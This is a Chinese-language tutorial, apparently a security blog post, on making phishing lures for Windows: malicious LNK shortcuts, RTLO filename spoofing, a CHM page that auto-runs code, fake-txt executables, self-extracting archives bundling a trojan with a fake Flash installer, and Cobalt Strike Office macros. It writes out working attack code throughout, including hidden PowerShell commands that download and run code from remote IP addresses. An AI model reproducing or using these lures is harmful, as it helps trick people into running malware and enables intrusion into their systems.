前言
随着钓鱼攻击的流行,赶紧把这块知识补充上。
lnk 快捷方式
简介
lnk 快捷方式放在硬盘上,用来方便使用者快速的调用。
应用
powershell命令快速生成lnk样本
如:a.ps1
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("Desktop.lnk")
$Shortcut.TargetPath = "%SystemRoot%\\system32\\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\\System32\\Shell32.dll,15"
$Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c echo (new-object net.webclient).DownloadString('http://106.xx.xx.xx:82/a')"
$Shortcut.Save()
icon 序号参考 https://help4windows.com/windows_7_shell32_dll.shtml
当点击Desktop 快捷方式时,就会执行powershell命令。
文件后缀RTLO
简介
RTLO全名为"RIGHT-TO-LEFTOVERRIDE",是一个不可显示的控制类字符,本质是unicode 字符。"RTLO"字符可使电脑将任意语言的文字内容按倒序排列。
应用
方法一:
对任意文件重命名,右键选择插入unicode控制字符--->RLO ,从右向左显示。
如输入fdp,从右向左显示即为pdf。
所以aaa.txt 就被重命名为aaatxt.pdf。但看文件属性依然是txt文本。
方法二:
使用python对文件重命名
import os
os.rename('apele.exe', 'apele\u202egnp.exe')
将恶意exe程序伪装为png图片,比较有迷惑性。
CHM文档
简介
CHM(Compiled Help Manual)即"已编译的帮助文件"。它是微软老式帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。
应用
创建index.html文件
<!DOCTYPE html>
<html>
<head>
<title>hello</title>
</head>
<body>
This is a test demo!
<OBJECT id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://106.xx.xx.xx:82/a')">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body>
</html>
使用EasyCHM工具选择编译为CHM
编译结束后。点击tmp.chm文件,即可触发powershell命令。
txt 钓鱼
简介
伪造txt文本的恶意程序,来迷惑对方更容易中招。实际上看似是txt文本实际为exe恶意程序。
应用
首先下载Bat_To_Exe_Converter项目
该项目利用bat转为exe,来生成exe恶意程序。
命令如下:
notepad
chcp 1200 & powershell -c "IEX(New-Object Net.WebClient)."DownloadString"('ht‘+’tp://106.53.97.7:82/a')"
再加入文本文件的ico图标,然后设置windows 不可见(即在点击是没有窗口执行)。
生成exe恶意程序。
利用文件后缀RTLO修改为txt后缀。重命名为applexe.txt。看似更加逼真。
当点击打开带txt文件,程序首先执行notepad打来txt,当关闭时执行powershell恶意代码。
自解压
简介
自解压指的是在没有压缩软件的主机上也可以进行解压的技术,生成的是exe文件。并可以设置在解压时执行某一段程序,这段程序被称为sfx程序。
应用
选择一个360.exe木马程序和一个flash安装程序flashplaye.exe。
选中这两个文件,创建自解压格式压缩文件。
选择高级---自解压文件选项---常规,填写解压路径C:\windows\temp
选择高级---设置,设置提取后运行的程序。
C:\windows\temp\360.exe
C:\windows\temp\flashplaye.exe
选择高级---模式---全部隐藏
选择高级---更新---"解压并更新文件"和"覆盖所有文件"
确定之后,桌面产生Desktop.exe文件。
此时利用ResourceHacker导出flash的ico图标。
利用同样的方法打开制作好的自解压捆绑木马,替换flash的图标,确认之后点击文件另存在。重新命名为flashplayerpp_install_cn_32.0.0.371.exe
当点击该flash进行更新时,就会解压执行360.exe恶意应用程序。
超长文件名
简介
如果文件名的长度大于指定的长度,超过40个字符长度,文件名末尾就会被隐藏。
应用
如下图伪造一个putty程序。
office宏
简介
宏攻击,是一种古老的攻击手法,在office中插入恶意的vbs代码,来执行恶意shellcode。在cs中就有现成的宏攻击。
应用
选择Cobalt Strike主界面中attacks--->packages--->ms office macro
创建宏word。点击 "Word 选项-->自定义功能区-->开发者工具(勾选) "
点击"开发工具"---"宏",新建宏名,点击创建。添加代码。
然后另存为启用宏的docm文件。
默认情况下,Office已经禁用所有宏。
这里修改设置为
当重新打开word文档时,CobaltStrike即会上线。
待补充
总结
- 邮件发送待解压rar文件,使用自解压触发恶意程序;
- xss配置flash钓鱼;
- 邮件发送word文档、excel表格,嵌入恶意程序;
参考资料
https://paper.seebug.org/1329/#part-2
https://www.shuzhiduo.com/A/QW5YN1oqdm/
https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247485861&idx=1&sn=a4b87208c753c317240c7ae063871cdb&chksm=9b392f14ac4ea60240ca3c84f39f65a3b5584a08dbcf07b6962c3464ae282c3a1003fa3de37a&mpshare=1&scene=23&srcid=0730e0o8JsXU5nKshFt8XOPS&sharer_sharetime=1596118625552&sharer_shareid=ff83fe2fe7db7fcd8a1fcbc183d841c4#rd
http://45.158.34.4/2020/08/06/gofish/
https://www.anquanke.com/post/id/198540
https://www.sec-in.com/article/847
